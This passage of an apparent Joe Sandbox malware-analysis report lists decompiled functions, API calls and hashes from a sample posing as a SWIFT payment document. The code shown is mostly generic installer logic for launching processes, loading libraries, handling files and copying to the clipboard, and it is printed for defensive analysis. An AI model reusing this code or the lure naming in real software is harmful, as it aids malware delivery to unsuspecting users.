						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c54
0x00405c74
0x00405c7c
0x00405c81
0x00000000
0x00405c87
0x00405c8b

APIs

CreateProcessW.KERNELBASE ref: 00405C74
CloseHandle.KERNEL32(?), ref: 00405C81

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32 ref: 00405867
GetDlgItem.USER32 ref: 00405876
GetClientRect.USER32 ref: 004058B3
GetSystemMetrics.USER32 ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32 ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32 ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32 ref: 004059C9
CreateThread.KERNEL32 ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32 ref: 00405AAA
GetWindowRect.USER32 ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32 ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32 ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
